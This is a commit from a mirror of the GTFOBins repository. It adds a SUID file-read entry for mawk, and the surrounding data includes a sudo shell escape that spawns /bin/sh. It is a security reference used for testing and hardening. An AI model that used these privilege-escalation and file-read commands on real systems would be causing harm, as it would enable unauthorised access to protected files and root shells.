mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Add SUID category to mawk as file read
This commit is contained in:
parent
31b69cfeed
commit
c293ed20f7
@ -10,6 +10,10 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
mawk '//' "$LFILE"
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./mawk '//' "$LFILE"
|
||||
sudo:
|
||||
- code: sudo mawk 'BEGIN {system("/bin/sh")}'
|
||||
limited-suid:
|
||||
|
Loading…
Reference in New Issue
Block a user